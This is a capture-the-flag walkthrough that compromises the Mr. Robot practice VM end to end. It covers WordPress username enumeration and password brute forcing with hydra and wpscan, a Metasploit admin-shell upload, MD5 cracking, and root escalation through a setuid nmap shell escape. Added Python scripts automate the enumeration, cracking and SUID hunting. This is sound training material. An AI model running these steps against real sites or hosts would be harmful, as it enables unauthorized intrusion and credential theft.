Mr. Robot CTF Hacking Complete Walkthrough

Information Gathering

netdiscover -i wlan0 - lists live hosts on the local network so we can pick out the target's address (here 192.168.1.108)

nmap -sV -O 192.168.1.108 - scans the target for open ports and service versions (-sV) and fingerprints the operating system (-O)

Vulnerability Assessment

Use web vulnerability scanners such as WPScan (WordPress-specific) or Nikto (general web server checks) to look for weaknesses.

wpscan --url 192.168.1.108
nikto -h 192.168.1.108

Capturing the first flag

Open http://192.168.1.108/robots.txt. It lists two files, fsocity.dic and key-1-of-3.txt.
Fetch them with wget (or through Burp Suite) and read the first key:

wget http://192.168.1.108/fsocity.dic
wget http://192.168.1.108/key-1-of-3.txt
cat key-1-of-3.txt

Optimizing the dictionary file

The dictionary file contains many duplicate lines, so it should be de-duplicated before use.
Every duplicate is a wasted login attempt during the brute-force/dictionary attack, so removing them shrinks the file and cuts the cracking time. sort -u already removes duplicates, so piping the result into uniq as well is redundant:

sort -u fsocity.dic > Newfsocity.dic

Run wpscan and locate the login page (/wp-login.php). We need a username and a password; luckily the dictionary file gives us candidates for both.

To see exactly which fields the form posts, we intercept the login request and read it. Burp or ZAP both work; I am going to use Burp.

Proxy the browser through Burp with intercept off, then turn intercept on, enter any credentials and click Log In.
The intercepted POST request shows the field names we need to brute force: log (username) and pwd (password).

We now need an online (network-based) brute-force tool; hydra handles HTTP POST forms well.

We are going to target the log and pwd fields.

The objective is to find a valid username first; we can then brute force its password separately.

hydra -V -L Newfsocity.dic -p test 192.168.1.108 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"

hydra's http-post-form syntax is path:post-body:F=failure-string, and this pattern works for most login forms.

The F= condition is what makes this a username scan rather than a password guess: WordPress answers "Invalid username" when the account does not exist but gives a different error for a wrong password, so any word in the list that does not trigger the failure string is a real account. The dummy password (-p test) never needs to be right.

With the username (elliot) confirmed, we can use wpscan to crack the password, because it is purpose-built for WordPress and faster here.

wpscan --url 192.168.1.108 --wordlist /home/alexis/Desktop/Newfsocity.dic --username elliot

(--wordlist and --username are the old WPScan 2.x options; WPScan 3.x uses --passwords/-P and --usernames/-U instead.)
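The two phases above, username enumeration on the "Invalid username" error and then password guessing against the confirmed account, reduced to one Python script. This is an added example, not part of the original walkthrough and not code from hydra or WPScan. It starts a fake wp-login.php on localhost that imitates the classic WordPress error messages, so the account, password, wordlist and error text are all constructed assumptions and nothing here talks to a real host.

```python
"""Username enumeration and password guessing against a WordPress-style
login form, mirroring the hydra and wpscan steps of the walkthrough.
The embedded server is a constructed stand-in for wp-login.php so the
script runs offline.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample account known to the fake site (not the CTF's real credentials).
FAKE_USERS = {"elliot": "s3cret-p4ss"}

# Constructed stand-in for the de-duplicated fsocity.dic.
WORDLIST = ["admin", "mrrobot", "elliot", "fsociety", "s3cret-p4ss"]


class FakeWpLogin(BaseHTTPRequestHandler):
    """Imitates classic WordPress wp-login.php responses (assumed wording)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        pwd = form.get("pwd", [""])[0]
        if user not in FAKE_USERS:
            body = "<strong>ERROR</strong>: Invalid username."
        elif FAKE_USERS[user] != pwd:
            body = ("<strong>ERROR</strong>: The password you entered for the "
                    f"username <strong>{user}</strong> is incorrect.")
        else:  # successful login: WordPress redirects to the dashboard
            self.send_response(302)
            self.send_header("Location", "/wp-admin/")
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the server quiet
        pass


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Return None so a 302 surfaces as HTTPError instead of being followed."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def try_login(base_url, user, pwd):
    """Post one credential pair; return 'no_user', 'bad_pass' or 'ok'."""
    data = urllib.parse.urlencode(
        {"log": user, "pwd": pwd, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(base_url + "/wp-login.php", data=data)
    try:
        body = OPENER.open(req, timeout=5).read().decode()
    except urllib.error.HTTPError as err:
        if err.code in (301, 302):  # redirect to /wp-admin/ means success
            return "ok"
        raise
    if "Invalid username" in body:  # the same string hydra's F= condition uses
        return "no_user"
    return "bad_pass"


def enumerate_users(base_url, wordlist):
    """Phase 1 (hydra): a dummy password suffices, only the error text matters."""
    return [w for w in wordlist if try_login(base_url, w, "test") != "no_user"]


def crack_password(base_url, user, wordlist):
    """Phase 2 (wpscan): try each word against the confirmed username."""
    for w in wordlist:
        if try_login(base_url, user, w) == "ok":
            return w
    return None


def start_fake_site():
    """Bind the fake wp-login.php on a free localhost port; returns (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeWpLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    srv, url = start_fake_site()
    users = enumerate_users(url, WORDLIST)
    print("valid usernames:", users)
    for u in users:
        print(u, "->", crack_password(url, u, WORDLIST))
    srv.shutdown()
```

The point to notice is that the two phases use the same request and differ only in what they read from the response: phase one ignores the password and keys on the "Invalid username" text, phase two keys on the redirect. A site that returned one generic message for both failures would defeat phase one and force the attacker to guess usernames and passwords together.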

Exploitation

We can now log in to WordPress as elliot, who is an administrator. That lets us install plugins such as a file manager and upload PHP, which is enough to drop a backdoor (weevely would do this and give us a reverse shell). Metasploit does the same work for us: its WordPress admin shell upload module logs in with the credentials, uploads a malicious plugin and hands back a meterpreter session.

msfconsole

search wp_admin_shell

The hit is exploit/unix/webapp/wp_admin_shell_upload. Select it, set the credentials and target, and run it:

use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME elliot
set PASSWORD <the cracked password>
set RHOSTS 192.168.1.108
exploit

(older Metasploit versions call the target option RHOST instead of RHOSTS.)

This gives us a meterpreter session; dropping into a shell from it works, but the shell has no tty (no controlling terminal).

From meterpreter, start a shell:

shell

/bin/sh -i gives a prompt but still no terminal, and that matters on this box: su refuses to run without one. Spawning a pty with python fixes it:

python -c 'import pty; pty.spawn("/bin/sh")'

We can check who we are logged in as.

id

cd /home/robot
ls -l

The directory holds two files: key-2-of-3.txt, readable only by robot, and password.raw-md5, which is world-readable.

cat password.raw-md5

It contains a username and the raw MD5 hash of robot's password. We can crack it with hashcat or, because I am lazy, crackstation.net.

With the password cracked we can switch to robot (this is the step that needs the pty from earlier):

su robot

We can then read the second key:

cat /home/robot/key-2-of-3.txt
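The offline half of this step, cracking a user:md5 file against the de-duplicated dictionary, as an added Python example that is not from the walkthrough. The hash file and wordlist below are constructed: the hash is the RFC 1321 test vector MD5("abc"), not the CTF's real hash, and the wordlist is a few made-up lines with the duplicates that fsocity.dic also has, so the same script shows why the sort -u step pays off.

```python
"""Offline dictionary attack on a user:md5 file such as password.raw-md5.
Added example; the hash file and wordlist are constructed inputs.
"""
import hashlib

# Constructed stand-in for password.raw-md5. The digest is MD5("abc")
# from the RFC 1321 test suite, so the "password" is simply abc.
SAMPLE_HASH_FILE = "robot:900150983cd24fb0d6963f7d28e17f72\n"

# Constructed stand-in for fsocity.dic, duplicates included on purpose.
SAMPLE_WORDLIST = "mrrobot\nelliot\nabc\nelliot\nfsociety\nabc\n"


def dedupe(words):
    """sort -u equivalent that keeps first-seen order, so early words stay early."""
    seen = set()
    out = []
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def parse_hash_file(text):
    """Parse 'user:hexhash' lines into {user: hash}; lines that are not
    32 hex characters after the colon are skipped rather than trusted."""
    creds = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            creds[user.strip()] = digest
    return creds


def crack_md5(creds, wordlist):
    """Hash each candidate once and look it up against every target hash,
    so N users cost no more than one user. Returns {user: password}."""
    targets = {}  # hash -> [users sharing it]
    for user, digest in creds.items():
        targets.setdefault(digest, []).append(user)
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in targets.get(digest, []):
            found[user] = word
        if len(found) == len(creds):
            break  # nothing left to crack
    return found


if __name__ == "__main__":
    words = dedupe(SAMPLE_WORDLIST.splitlines())
    print(f"{len(words)} unique candidates")
    print(crack_md5(parse_hash_file(SAMPLE_HASH_FILE), words))
```

The equivalent hashcat run on the real file is hashcat -m 0 --username password.raw-md5 Newfsocity.dic: -m 0 selects raw MD5 and --username tells hashcat to skip the user: prefix on each line.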

Privilege Escalation

We now need root access, also known as privilege escalation.
A common route on a box like this is a root-owned binary with the setuid (SUID) bit set: it runs with its owner's privileges no matter who launches it.

We can use the find command (-type f skips directories, 2>/dev/null hides permission errors):

find / -perm -4000 -type f 2>/dev/null

nmap shows up in the list, owned by root with SUID set.

Old nmap releases (3.x to 5.x) have an interactive mode that accepts shell escapes, and because the binary is SUID root anything it spawns runs as root:

nmap --interactive

!sh - at the nmap prompt spawns a root shell

id - and we are root (euid=0)

Go to the root directory and read the last key:

cd /root
cat key-3-of-3.txt
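The SUID audit behind the find command above, as an added Python example that is not part of the walkthrough. It walks a tree the way find / -perm -4000 -type f does, then flags setuid files whose name is on a short illustrative list of binaries that can hand out a shell (old nmap via --interactive and !sh, find via -exec, editors and pagers via their shell escapes); that list is an assumption for illustration, not a complete catalogue. The demo tree it builds under a temporary directory is constructed.

```python
"""Find setuid files under a root and flag the ones that can spawn a shell,
the check behind 'find / -perm -4000 -type f' in the walkthrough.
Added example; SHELL_CAPABLE is a short illustrative list.
"""
import os
import stat
import tempfile

# Assumed short list of binaries that give a shell when run setuid root.
SHELL_CAPABLE = {"nmap", "find", "vim", "vi", "less", "more", "bash", "python", "awk"}


def is_suid(mode):
    """True for a regular file with the setuid bit (the leading 4 in 4755)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root):
    """Walk root like find -perm -4000 -type f, ignoring unreadable dirs."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if is_suid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def owned_by_root(paths):
    """Keep only root-owned entries; a setuid file owned by a user only escalates to that user."""
    return [p for p in paths if os.lstat(p).st_uid == 0]


def shell_capable(paths):
    """Keep the setuid files whose basename is a known shell-spawning binary."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]


def make_demo_tree():
    """Constructed sample tree: setuid 'nmap', setuid 'true', plain 'cat'."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("true", 0o4755), ("cat", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = make_demo_tree()  # replace with "/" for a real audit
    hits = find_suid(root)
    print("setuid files:", hits)
    print("worth trying for a shell:", shell_capable(owned_by_root(hits)))
```

Run it with root = "/" on the target and compare the shell_capable output against the full list of setuid files: the plain list is what the find command gives you, the filtered list is where to start.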

Done.
